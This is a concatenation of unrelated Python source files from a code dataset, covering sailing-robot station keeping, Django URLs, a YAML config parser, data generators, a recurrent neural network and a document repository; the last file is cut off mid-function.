wayPntDist2)\n wayPtCoords[1] = standardcalc.GPSDistAway(rightMidpnt, wayPntDist2, -wayPntDist1)\n wayPtCoords[2] = standardcalc.GPSDistAway(botMidpnt, -wayPntDist1, -wayPntDist2)\n wayPtCoords[3] = standardcalc.GPSDistAway(leftMidpnt, -wayPntDist2, wayPntDist1)\n \n return wayPtCoords\n\n\ndef SKTimer():\n gVars.SKMinLeft = ((datetime.now() - gVars.taskStartTime ).seconds) / 60\n gVars.SKSecLeft = ((datetime.now() - gVars.taskStartTime ).seconds) - gVars.SKMinLeft*60\n gVars.SKMilliSecLeft = ((datetime.now() - gVars.taskStartTime).microseconds) / 1000\n\ndef getBoxDist(boxCoords):\n boxDistList = [] #top, right, bottom, left\n TL2Boat = standardcalc.distBetweenTwoCoords(gVars.currentData[sVars.GPS_INDEX], boxCoords[0]) #top left to boat\n TR2Boat = standardcalc.distBetweenTwoCoords(gVars.currentData[sVars.GPS_INDEX], boxCoords[1]) #top right to boat\n BR2Boat = standardcalc.distBetweenTwoCoords(gVars.currentData[sVars.GPS_INDEX], boxCoords[2]) #bottom right to boat\n TL2TR = standardcalc.distBetweenTwoCoords(boxCoords[0], boxCoords[1]) #top left to top right\n TR2BR = standardcalc.distBetweenTwoCoords(boxCoords[1], boxCoords[2]) #top right to bottom right\n \n topLeftAngle = standardcalc.findCosLawAngle(TL2TR, TL2Boat, TR2Boat)\n rightTopAngle = standardcalc.findCosLawAngle(TR2BR, TR2Boat, BR2Boat)\n \n boxDistList[0] = TL2Boat * math.sin(topLeftAngle) #top dist\n boxDistList[1] = TR2Boat * math.sin(rightTopAngle) #right dist\n boxDistList[2] = 40 - boxDistList[0] #bottom dist\n boxDistList[3] = 40 - boxDistList[1] #left dist\n return boxDistList\n\ndef stationKeepInit(topLeftWaypnt, topRightWaypnt, botLeftWaypnt, botRightWaypnt):\n topLeftCoord = topLeftWaypnt.coordinate\n topRightCoord = topRightWaypnt.coordinate\n botLeftCoord = botLeftWaypnt.coordinate\n botRightCoord = botRightWaypnt.coordinate\n boxCoords = standardcalc.setBoxCoords(topLeftCoord, topRightCoord, botLeftCoord, 
botRightCoord) #boxCoords[0] = TL, boxCoords[1] = TR, boxCoords[2] = BR, boxCoords[3] = BL\n wayPtCoords = setWayPtCoords(boxCoords) #top, right, bottom, left\n spdList = [0.75]*10\n boxDistList = getBoxDist(boxCoords) #top, right, bottom, left\n meanSpd = 0.75 #from old arduino code\n arduino = gVars.arduino\n gVars.SKCurrentWaypnt = boxDistList.index(min(boxDistList))\n logger = SBLogger.logger()\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n logger.info(\"The current waypoint is \" + gVars.SKCurrentWaypnt + \". 0 means top, 1 means right, 2 means bottom, 3 means left\")\n logger.info(\"Station Keeping Initialization finished. Now running Station Keeping Challenge\")\n run(boxCoords, wayPtCoords, spdList, meanSpd, arduino, logger)\n return\n \ndef run(boxCoords, wayPtCoords, spdList, meanSpd, arduino, logger):\n exiting = 0\n while (((datetime.now() - gVars.taskStartTime).seconds < 300) and (gVars.kill_flagSK == 0)):\n secLeft = 300 - (datetime.now() - gVars.taskStartTime).seconds\n turning = 0\n SKTimer()\n boxDistList = getBoxDist(boxCoords)\n if (exiting == 0):\n if (standardcalc.isWPNoGo(gVars.currentData[sVars.AWA_INDEX],gVars.currentData[sVars.HOG_INDEX], gVars.SKCurrentWaypnt, gVars.currentData[sVars.SOG_INDEX], gVars.currentData[sVars.GPS_INDEX])):\n logger.info(\"The boat is sailing upwind. Changing current waypoint.\")\n gVars.SKCurrentWaypnt = (gVars.SKCurrentWaypnt + 1) % 4\n logger.info(\"The current waypoint is \" + gVars.SKCurrentWaypnt + \". 0 means top, 1 means right, 2 means bottom, 3 means left\")\n gVars.kill_flagPTP = 1\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n turning = 1\n if (boxDistList[gVars.SKCurrentWaypnt] < 5):\n logger.info(\"The boat is too close to an edge. Changing current waypoint.\")\n gVars.SKCurrentWaypnt = (gVars.SKCurrentWaypnt + 2) % 4\n logger.info(\"The current waypoint is \" + gVars.SKCurrentWaypnt + \". 0 means top, 1 means right, 2 means bottom, 3 means left\")\n gVars.kill_flagPTP = 1\n logger.info(\"Commencing gybe.\")\n if (gVars.currentData[sVars.AWA_INDEX] < 0):\n arduino.gybe(1)\n else:\n arduino.gybe(0)\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n turning = 1\n if (turning == 0):\n spdList = standardcalc.changeSpdList(spdList)\n meanSpd = standardcalc.meanOfList(spdList)\n logger.info(\"The mean speed of the boat is \" + meanSpd + \" metres per second.\")\n if (boxDistList[gVars.SKCurrentWaypnt] >= meanSpd*(secLeft+2)): #leeway of 2 seconds\n exiting = 1\n logger.info(\"Station Keeping event is about to end. Exiting to current waypoint.\")\n elif (boxDistList[(gVars.SKCurrentWaypnt + 2) % 4] >= meanSpd*(secLeft+2+4) ): #leeway of 2 seconds, 4 seconds for gybe\n gVars.SKCurrentWaypnt = (gVars.SKCurrentWaypnt + 2) % 4\n gVars.kill_flagPTP = 1\n logger.info(\"Station Keeping event is about to end. Gybing and exiting to waypoint \" + gVars.SKCurrentWaypnt)\n if (gVars.currentData[sVars.AWA_INDEX] < 0):\n arduino.gybe(1)\n else:\n arduino.gybe(0)\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n exiting = 1\n if (gVars.kill_flagSK == 1):\n logger.info(\"Station Keeping Kill Flag initialized. 
Station Keeping Challenge has been stopped.\")\n else:\n logger.info(\"Station Keeping Challenge timer has ended.\")\n boxDistList = getBoxDist(boxCoords)\n gVars.SKMinLeft = 0\n gVars.SKSecLeft = 0\n gVars.SKMilliSecLeft = 0\n gVars.kill_flagSK = 0\n gVars.SKCurrentWaypnt = None\n \n return","sub_path":"control/challenge/stationkeeping.py","file_name":"stationkeeping.py","file_ext":"py","file_size_in_byte":8737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"20604800","text":"\"\"\"timetracker URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url, patterns\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n url(r'^$', 'timetracker.views.index', name=\"index\"),\n url(r'^activities/', include('timetrack.urls', namespace=\"timetrack\")),\n url(r'^login/$', 'timetracker.views.login_view', name=\"login\"),\n url(r'^loginuser/$', 'timetracker.views.login_user', name=\"login_user\"),\n url(r'^logout/$', 'timetracker.views.logout_user', name=\"logout_user\"),\n url(r'^admin/', include(admin.site.urls)),\n]\n\nurlpatterns += patterns(\n '',\n url(r'^404/$', TemplateView.as_view(template_name='404.html')),\n url(r'^500/$', TemplateView.as_view(template_name='500.html')),\n)\n","sub_path":"timetracker/timetracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"129875483","text":"def intersection(arrays):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n result = []\n hash_table = {}\n count = len(arrays)\n\n for single_array in arrays:\n for number in single_array:\n if number not in hash_table:\n hash_table[number] = 1\n else:\n hash_table[number] += 1\n if hash_table[number] == len(arrays):\n result.append(number)\n # print(hash_table) \n return result\n\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000, 2000000)) + [1, 2, 3])\n arrays.append(list(range(2000000, 3000000)) + [1, 2, 3])\n arrays.append(list(range(3000000, 4000000)) + [1, 2, 3])\n\n print(intersection(arrays))\n","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"373308987","text":"# SCAR - Serverless Container-aware ARchitectures\n# Copyright (C) GRyCAP - I3M - UPV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the 
specific language governing permissions and\n# limitations under the License.\n\nimport yaml\nimport os\n\nclass Function:\n def __init__(self, name, image):\n self.name = name\n self.image_id = image\n\nclass YamlParser(object):\n \n def __init__(self, args):\n file_path = args.conf_file\n self.func = args.func\n if os.path.isfile(file_path):\n with open(file_path) as cfg_file:\n self.__setattr__(\"yaml_data\", yaml.safe_load(cfg_file))\n \n def parse_arguments(self):\n functions = []\n for function in self.yaml_data['functions']:\n functions.append(self.parse_function(function, self.yaml_data['functions'][function]))\n return functions[0]\n \n def parse_function(self, function_name, function_data):\n args = {'func' : self.func }\n # Get function name\n args['name'] = function_name\n # Parse function information\n if 'image' in function_data:\n args['image_id'] = function_data['image']\n if 'image_file' in function_data:\n args['image_file'] = function_data['image_file']\n if 'time' in function_data:\n args['time'] = function_data['time']\n if 'memory' in function_data:\n args['memory'] = function_data['memory']\n if 'timeout_threshold' in function_data:\n args['timeout_threshold'] = function_data['timeout_threshold']\n if 'lambda_role' in function_data:\n args['lambda_role'] = function_data['lambda_role']\n if 'description' in function_data:\n args['description'] = function_data['description']\n if 'init_script' in function_data:\n args['init_script'] = function_data['init_script']\n if 'run_script' in function_data:\n args['run_script'] = function_data['run_script'] \n if 'extra_payload' in function_data:\n args['extra_payload'] = function_data['extra_payload']\n if 'log_level' in function_data:\n args['log_level'] = function_data['log_level']\n if 'environment' in function_data:\n variables = []\n for k,v in function_data['environment'].items():\n variables.append(str(k) + '=' + str(v))\n args['environment_variables'] = variables\n # LOG COMMANDS\n if 'log_stream_name' in function_data:\n args['log_stream_name'] = function_data['log_stream_name']\n if 'request_id' in function_data:\n args['request_id'] = function_data['request_id']\n \n if 'data_binary' in function_data:\n args['data_binary'] = function_data['data_binary']\n \n if 's3' in function_data:\n s3_data = function_data['s3']\n if 'deployment_bucket' in s3_data:\n args['deployment_bucket'] = s3_data['deployment_bucket']\n if 'input_bucket' in s3_data:\n args['input_bucket'] = s3_data['input_bucket']\n if 'input_folder' in s3_data:\n args['input_folder'] = s3_data['input_folder']\n if 'output_bucket' in s3_data:\n args['output_bucket'] = s3_data['output_bucket']\n if 'output_folder' in s3_data:\n args['output_folder'] = s3_data['output_folder']\n if 'api_gateway' in function_data:\n api_data = function_data['api_gateway']\n if 'name' in api_data:\n args['api_gateway_name'] = api_data['name']\n if 'parameters' in api_data:\n args['parameters'] = api_data['parameters']\n return args\n ","sub_path":"src/parser/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"599726622","text":"# coding=utf-8\nfrom collections import defaultdict\n\nimport pandas as pd\nfrom faker import Factory\nfrom sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.utils import check_random_state\n\n# The default number of sample returned by generators\nNB_SAMPLE = 10\n\n\nclass TestGenerator(TransformerMixin, 
BaseEstimator):\n \"\"\"Generate random data in the form of a DataFrame for test purpose.\n\n Can generate:\n * categorical data from a sample\n * numeric data between a range\n * time series data as the index at a given start date and with a given frequency\n\n Parameters\n ----------\n freq: string (default='D')\n Frequency compliant with the pandas frequency aliases.\n start_date: string or datetime-like, (default='today')\n The first date of the index.\n categ_sample: list (default=('foo', 'bar'))\n The list of values used to generate categorical data.\n num_sample: list (default=('foo', 'bar'))\n The list of values used to generate categorical data.\n nb_sample: int (default=NB_SAMPLE)\n The number of sample (row) to generate.\n random_state : RandomState or an int seed (default=0)\n A random number generator instance to define the state of the random permutations generator.\n Returns\n -------\n df_converted\n The DataFrame with normalized columns.\n \"\"\"\n\n def __init__(self, freq='D', start_date='today', categ_sample=('foo', 'bar'), num_sample=(0, 100),\n nb_sample=NB_SAMPLE, random_state=0):\n self.freq = freq\n self.start_date = start_date\n self.categ_sample = categ_sample\n self.num_sample = num_sample\n self.nb_sample = nb_sample\n self.random_state = random_state\n\n def transform(self, X, **transform_params):\n random_state = check_random_state(self.random_state)\n # Generating a sample and selecting a subset to randomize them\n df = pd.DataFrame({'categ': random_state.choice(self.categ_sample, self.nb_sample),\n 'number': random_state.randint(self.num_sample[0], self.num_sample[1], self.nb_sample)\n },\n index=random_state.choice(\n pd.date_range(start=pd.to_datetime(self.start_date), periods=self.nb_sample * 3,\n freq=self.freq),\n self.nb_sample))\n # DateTimeIndex shall be sorted\n df.sort_index(inplace=True)\n return df\n\n def fit(self, X, y=None, **fit_params):\n # Does nothing\n return self\n\n\nclass FakeGenerator(TransformerMixin, BaseEstimator):\n \"\"\"A Fake generator wrapping the Faker data generator http://fake-factory.readthedocs.org/en/stable/.\n\n Parameters\n ----------\n fakes: list (default=('name', 'address', 'text']))\n The list of fake to generate, a column by fake will be generated\n locale: string (default=None)\n The locale to use, see the Faker documentation.\n nb_sample: int (default=NB_SAMPLE)\n The number of sample (row) to generate.\n random_state : RandomState or an int seed (default=0)\n A random number generator instance to define the state of the random permutations generator.\n\n Returns\n -------\n DataFrame\n Containing the fake values (a column by fake and `nb_sample` rows) with a default index.\n\n Raises\n ------\n ValueError\n If a fake is not supported.\n \"\"\"\n\n def __init__(self, fakes=('name', 'address', 'text'), locale=None, nb_sample=NB_SAMPLE, random_state=0):\n self.fakes = fakes\n self.locale = locale\n self.nb_sample = nb_sample\n self.random_state = random_state\n\n def transform(self, X, **transform_params):\n _data = defaultdict(list)\n faker = Factory.create(self.locale)\n random_state = check_random_state(self.random_state)\n faker.seed(self.random_state)\n for sample in range(self.nb_sample):\n for fk in self.fakes:\n try:\n _data[fk].append(getattr(faker, fk)())\n except AttributeError as e:\n _msg = 'Fake [%s] not supported' % fk\n raise Exception(_msg)\n return pd.DataFrame.from_dict(_data)\n\n def fit(self, X, y=None, **fit_params):\n # Does nothing\n return 
self","sub_path":"pyranha/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"452251196","text":"import cv2\r\nimport numpy as np\r\n\r\ncam=cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n k=cv2.waitKey(1)\r\n if k & 0xFF==ord('q'):\r\n break\r\n _,frame=cam.read()\r\n img=cv2.inRange(frame,np.array([0,0,0]),np.array([180,255,30]))\r\n im2,contours,hierarchy = cv2.findContours(img, 1, 2)\r\n for i in range(len(contours)):\r\n cnt = contours[i]\r\n area = cv2.contourArea(cnt)\r\n if area>200:\r\n print(area)\r\n cv2.imshow('Image',img)\r\n","sub_path":"Focal_length_calculation/fl_C.py","file_name":"fl_C.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613355007","text":"\"\"\"FormScribe meta classes.\"\"\"\n\n\nfrom formscribe.error import InvalidFieldError\n\n\nclass MetaField(type):\n \"\"\"Field metaclass.\"\"\"\n\n def __call__(cls, *args, **kwargs):\n instance = object.__new__(cls, *args, **kwargs)\n\n regex_attributes = [getattr(instance, attribute) for attribute in\n ('regex_group', 'regex_group_key', 'regex_key')]\n if any(regex_attributes) and not all(regex_attributes):\n raise InvalidFieldError('The following attributes are required:'\n ' regex_group, regex_group_key,'\n ' regex_key.')\n\n if instance.regex_key and instance.key:\n raise InvalidFieldError('The following attributes are incompatible:'\n ' regex_key, key.')\n\n if not instance.key and not all(regex_attributes):\n raise InvalidFieldError('Field must be either key-based or'\n ' regex-based.')\n\n instance.__init__()\n\n try:\n automatically_validate = kwargs['automatically_validate']\n except KeyError:\n try:\n automatically_validate = args[1]\n except IndexError:\n automatically_validate = True\n\n if automatically_validate:\n try:\n return instance.validate(kwargs['value'])\n except KeyError:\n try:\n return instance.validate(args[0])\n except IndexError:\n pass\n\n return instance\n","sub_path":"formscribe/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613101452","text":"import numpy as np\nfrom mlp.activation_functions import Sigmoid\nfrom sklearn.metrics import accuracy_score\nfrom mlp import NeuralNet\nfrom mlp.util import BSSF\nfrom rnn import util\n\n\nclass BPTT(NeuralNet):\n def __init__(self, features=6, hidden=60, classes=7,\n u_back=(0, 20), u_forward=(-21, -1), v_range=(10, 50), k_back=1, k_forward=1,\n learning_rate=0.9, a_func=Sigmoid, max_epochs=1000, patience=20,\n validation_set=None, multi_vsets=False, classification=True):\n self.H = np.arange(hidden)\n # get correct indexes\n self._k = k_back\n self._j = k_forward\n # setup extra matrices and values\n self._hb = u_back\n self._hf = u_forward\n self._v = v_range\n # recurrent matrices\n self.V = self.input_matrix(features, *v_range)\n if u_back and k_back > 0:\n self.Ub = self.recurrent_matrix(*u_back)\n self.δb = self.delta_vecs(u_back, k_back)\n self.Zb = self.Z_vecs(hidden, k_back)\n self.Zin_b = self.Z_vecs(features, k_back)\n if u_forward and k_forward > 0:\n self.Uf = self.recurrent_matrix(*u_forward)\n self.δf = self.delta_vecs(u_forward, k_forward)\n self.Zf = self.Z_vecs(hidden, k_forward)\n self.Zin_f = self.Z_vecs(features, k_forward)\n super().__init__(features, hidden, classes, learning_rate, 
a_func, max_epochs, patience, validation_set,\n multi_vsets, classification)\n # overwrite W so there's only one\n self.W = np.random.randn(hidden, classes)\n print(\"BPTT!\")\n\n def fit(self, X, Y, multi_sets=False):\n epoch = 0\n Δp = 0\n bssf = BSSF(self.W, self.b, 0)\n if not multi_sets:\n X = [X]\n Y = [Y]\n while epoch < self._max_epochs and Δp < self._patience:\n idx = util.get_indices(X, multi_sets, self._k, self._j)\n for i, j in idx:\n self._forward_prop_tt(X[i], j)\n self._back_prop(Y[i][j])\n epoch += 1\n # Do validation check\n if self._VS:\n score = self.score(self._VS[0], self._VS[1], multi_sets=self._multi_vsets)\n if score > bssf.score:\n bssf = BSSF(self.W, self.b, score)\n Δp = 0\n else:\n Δp += 1\n # if training stopped because of patience, use bssf instead\n if self._VS and Δp >= self._patience:\n self.W = bssf.W\n self.b = bssf.b\n return epoch\n\n # region Predict and Score\n def predict(self, X, multi_sets=False):\n out = []\n if not multi_sets:\n X = [X]\n idx = util.get_indices(X, multi_sets, self._k, self._j, shuffle=False)\n for i, j in idx:\n z = self._forward_prop_tt(X[i], j)\n if self._classification:\n q = np.zeros(z.shape)\n q[z.argmax()] = 1.\n out.append(q)\n else:\n out.append(z)\n return np.array(out)\n\n def score(self, X, y, sample_weight=None, multi_sets=False):\n y2 = []\n if not multi_sets:\n y = [y]\n idx = util.get_indices(y, multi_sets, self._k, self._j, shuffle=False)\n for i, j in idx:\n y2.append(y[i][j])\n y2 = np.array(y2)\n predicted = self.predict(X, multi_sets)\n return accuracy_score(y2, predicted, sample_weight=sample_weight)\n # endregion\n\n def _forward_prop_tt(self, Xi, j):\n # initial activation of hidden layer\n self.Z[1] = np.ones(self.Z[1].shape)\n self.Z[1] *= .0001\n # backwards t\n if self.Ub is not None:\n t = self._k\n for i in range(self._k):\n x = Xi[j-t+i]\n xt = x.reshape(1, len(x))\n self.Zin_b[i] = xt\n self.Z[1][:,slice(*self._v)] += self.activation(xt.dot(self.V) + self.b[0][:, slice(*self._v)])\n self.Z[1][:,slice(*self._hb)] += self.activation(self.Z[1][:,slice(*self._hb)].dot(self.Ub) +\n self.b[0][:,slice(*self._hb)])\n self.Zb[i] = self.Z[1].copy()\n # t == 0\n x = Xi[j]\n self.x0 = x.reshape(1, len(x))\n self.Z[1][:,slice(*self._v)] += self.activation(self.x0.dot(self.V) + self.b[0][:,slice(*self._v)])\n # forwards t\n if self.Uf is not None:\n for i in range(self._j):\n x = Xi[j+i+1]\n xt = x.reshape(1, len(x))\n self.Z[1][:,slice(*self._v)] += self.activation(xt.dot(self.V) + self.b[0][:,slice(*self._v)])\n self.Z[1][:,slice(*self._hf)] += self.activation(self.Z[1][:,slice(*self._hf)].dot(self.Ub) +\n self.b[0][:,slice(*self._hf)])\n self.Zf[i] = self.Z[1].copy()\n # output layer\n self.Z[-1] = self.activation(self.Z[-2].dot(self.W) + self.b[-1])\n return self.Z[-1][0]\n\n def _back_prop(self, y):\n # output layer's delta: δ = (T-Z) * f'(net)\n self.δ[-1] = (y - self.Z[-1]) * self.f_prime(self.Z[-1])\n # compute deltas: δj = Σ[δk*Wjk] * f'(net)\n self.δ[0] = np.zeros(self.δ[0].shape) # initially clear\n # t backwards\n if self.Ub is not None:\n self.δb[-1] = np.tensordot(self.δ[-1], self.W, (1, 1))[:,slice(*self._hb)] * self.f_prime(self.Zb[-1][:,slice(*self._hb)])\n for i in range(self._k-1, 0, -1):\n self.δb[i-1] = np.tensordot(self.δb[i], self.Ub, (1, 1)) * self.f_prime(self.Zb[i][:,slice(*self._hb)])\n # t == 0\n self.δ[0][:,slice(*self._v)] = np.tensordot(self.δ[-1], self.W, (1, 1))[:,slice(*self._v)] * self.f_prime(self.Z[1][:,slice(*self._v)])\n # t forwards\n if self.Uf is not None:\n self.δf[-1] = 
np.tensordot(self.δ[-1], self.W, (1, 1))[:,slice(*self._hf)] * self.f_prime(self.Zf[-1][:,slice(*self._hf)])\n for i in range(self._j-1, 0, -1):\n self.δf[i-1] = np.tensordot(self.δf[i], self.Uf, (1, 1)) * self.f_prime(self.Zf[i][:,slice(*self._hf)])\n\n # update weights: ΔWij = C*δj*Zi\n # output layer\n self.W += self.C * np.outer(self.Z[1], self.δ[-1])\n self.b[-1] += self.C * self.δ[-1]\n # recurrent layers\n ΔV = np.zeros(self.V.shape)\n nv = np.zeros(self.V.shape)\n Δb = np.zeros(self.b[0].shape)\n nb = np.zeros(self.b[0].shape)\n # backwards\n if self.Ub is not None:\n ΔUb = np.zeros(self.Ub.shape)\n for i in range(self._k):\n ΔUb += self.C * np.outer(self.Zb[i][:,slice(*self._hf)], self.δb[i])\n ΔV[:,slice(*self._hb)] += self.C * np.outer(self.Zin_b[i], self.δb[i])\n nv[:,slice(*self._hb)] += 1\n Δb[:,slice(*self._hb)] += self.C * self.δb[i]\n nb[:,slice(*self._hb)] += 1\n ΔUb /= self._k\n self.Ub += ΔUb\n # t == 0\n ΔV += self.C * np.outer(self.x0, self.δ[0][:,slice(*self._v)])\n nv += 1\n Δb[:,slice(*self._v)] += self.C * self.δ[0][:,slice(*self._v)]\n nb[:,slice(*self._v)] += 1\n # forwards\n if self.Uf is not None:\n ΔUf = np.zeros(self.Uf.shape)\n for i in range(self._j):\n ΔUf += self.C * np.outer(self.Zf[i][:,slice(*self._hf)], self.δf[i])\n ΔV[:,slice(*self._hf)] += self.C * np.outer(self.Zin_f[i], self.δf[i])\n nv[:,slice(*self._hf)] += 1\n Δb[:,slice(*self._hf)] += self.C * self.δf[i]\n nb[:,slice(*self._hf)] += 1\n ΔUf /= self._j\n self.Uf += ΔUf\n ΔV /= nv\n Δb = Δb / nb\n self.V += ΔV\n self.b[0] += Δb\n\n def recurrent_matrix(self, start, stop):\n _len = self.H[stop] - self.H[start]\n return np.random.randn(_len, _len)\n\n def input_matrix(self, f, start, stop):\n _len = self.H[stop] - self.H[start]\n return np.random.randn(f, _len)\n\n def delta_vecs(self, h, k):\n start, stop = h\n _len = self.H[stop] - self.H[start]\n δ = []\n for i in range(k):\n δ.append(np.zeros(_len))\n return δ\n\n def Z_vecs(self, hidden, k):\n _Z = []\n for i in range(k):\n _Z.append(np.zeros(hidden))\n return _Z","sub_path":"rnn/bptt.py","file_name":"bptt.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"74797797","text":"\n\nimport sqlite3\nimport os\n\"\"\"\n- How many total Characters are there?\n- How many of each specific subclass?\n- How many total Items?\n- How many of the Items are weapons? How many are not?\n- How many Items does each character have? (Return first 20 rows)\n- How many Weapons does each character have? 
(Return first 20 rows)\n- On average, how many Items does each Character have?\n- On average, how many Weapons does each character have?\n\n\"\"\"\n\ndef connect_to_db(db_name=\"rpg_db.sqlite3\"):\n return sqlite3.connect(db_name)\n\ndef execute_query(cursor, query):\n cursor.execute(query)\n return cursor.fetchall()\nGET_CHARACTERS = \"\"\"\nSELECT count(character_id) FROM charactercreator_character;\n-- how many total characters are there\n\"\"\"\nGET_CHARACTERS = \"\"\"\nSELECT count(character_id) FROM charactercreator_character;\n-- how each specific sub class\n\"\"\"\n\n\n\n\nif __name__ == \"__main__\":\n conn = connect_to_db()\n curs = conn.cursor()\n results = execute_query(curs, GET_CHARACTERS)\n print(results)\n\n\n","sub_path":"module1-introduction-to-sql/rpg_work.py","file_name":"rpg_work.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"628598270","text":"from models import DigitalDocumentModel\nfrom utilities import ObjectValidation\nfrom anuvaad_auditor.errorhandler import post_error\nfrom datetime import datetime\nimport uuid\nfrom utilities import AppContext\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nimport json\n\nvalidator=ObjectValidation()\n\nclass DigitalDocumentRepositories:\n \n def __init__(self):\n self.docModel=DigitalDocumentModel()\n\n def store(self, userID, recordID, files): \n try:\n for file in files:\n\n # recordID= recordID\n jobID= recordID.split('|')[0]\n fileID=file['file']['identifier']\n file_name=file['file']['name']\n locale=file['config']['language']\n file_type=file['file']['type']\n\n pages =file['pages']\n log_info(\"DigitalDocumentRepo save document for user: {}| record: {}| count of pages received: {}\".format(userID,recordID,str(len(pages))), AppContext.getContext())\n \n blocks=[] \n for page in pages:\n block=self.create_regions_from_page(userID,jobID,recordID,fileID,file_name,locale,file_type,page)\n if len(block.keys())>5:\n blocks.append(block)\n else:\n return block\n log_info('DigitalDocumentRepo page blocks created for insert, user_id:{}, record_id:{}, block length:{}'.format(userID, recordID,str(len(blocks))), AppContext.getContext())\n result=self.docModel.store_bulk_blocks(blocks)\n if result == False:\n return False \n except Exception as e:\n AppContext.addRecordID(recordID)\n log_exception('Exception on save document | DigitalDocumentRepo :{}'.format(str(e)), AppContext.getContext(), e)\n return post_error(\"Data Missing\",\"Failed to store doc since :{}\".format(str(e)),None)\n \n\n\n def update_words(self, user_id, words):\n\n for word in words:\n Validation= validator.update_word_validation(word)\n if Validation is not None:\n return Validation\n\n page=word['page_no']\n region_id=word['region_id']\n word_id=word['word_id']\n record_id=word['record_id']\n user_word = word['updated_word']\n\n AppContext.addRecordID(record_id)\n log_info(\"DigitalDocumentRepo update word request\", AppContext.getContext())#str(page)\n region_to_update= self.docModel.get_word_region(user_id,record_id,region_id,page)\n if region_to_update:\n if region_to_update['identifier']== region_id :\n region_to_update['updated']=True\n for data in region_to_update['regions']:\n for word in data['regions']:\n if word['identifier']==word_id:\n word['ocr_text']=word['text']\n word['text']=user_word\n break\n else:\n pass\n # return post_error(\"Data Missing\",\"No record with the given user_id,record_id and word_id\",None)\n else:\n return 
post_error(\"Data Missing\",\"No record with the given user_id,record_id and region_id\",None)\n \n \n AppContext.addRecordID(record_id)\n log_info(\"DigitalDocumentRepo update word region :{}\".format(str(region_to_update)), AppContext.getContext())\n print(region_to_update)\n if self.docModel.update_word(user_id,record_id,region_id,region_to_update,page) == False:\n return post_error(\"Data Missing\",\"Failed to update word since data is missing\",None)\n return True\n\n\n def get_pages(self, record_id, start_page=1, end_page=5):\n\n total_page_count = self.docModel.get_document_total_page_count(record_id)\n if start_page == 0 and end_page == 0:\n start_page = 1\n end_page = total_page_count\n \n if start_page == 0:\n start_page = 1\n if end_page == 0:\n end_page = 5\n if start_page > end_page:\n return False\n if start_page > total_page_count:\n return False\n\n AppContext.addRecordID(record_id)\n log_info(\"DigitalDocumentRepo fetching doc by pages for record_id:{}\".format(str(record_id)), AppContext.getContext())\n pages = []\n data = {}\n data_page = []\n for i in range(start_page, end_page+1):\n page_block = self.docModel.get_record_by_page(record_id, i)\n if page_block == False:\n return False\n else:\n data_page.append(page_block)\n \n \n pg_block_formated=self.format_page_data(data_page)\n\n data['pages'] = pg_block_formated\n data['start_page'] = start_page\n data['end_page'] = end_page\n data['total'] = total_page_count\n return data\n\n \n def create_regions_from_page(self,userID,jobID,recordID,fileID,file_name,locale,file_type,page):\n try:\n AppContext.addRecordID(recordID)\n log_info('DigitalDocumentRepo page blocks creation started for record_id:{}, page_number:{}'.format(recordID,str(page['page_no'])), AppContext.getContext())\n block_info = {}\n block_info['userID']=userID\n block_info['jobID']=jobID\n block_info['recordID']=recordID\n block_info['file_identifier']=fileID\n block_info['file_name']=file_name\n block_info['file_locale']=locale\n block_info['file_type']= file_type\n block_info['created_on']=datetime.utcnow()\n\n\n page_info = {}\n page_info['page_no'] = page['page_no'] + 1\n page_info['page_identifier'] = page['identifier']\n page_info['page_boundingBox'] = page['boundingBox']\n page_info['page_img_path'] = page['path']\n if 'resolution' in page.keys():\n page_info['page_resolution'] = page['resolution']\n\n block_info['page_info'] = page_info\n\n 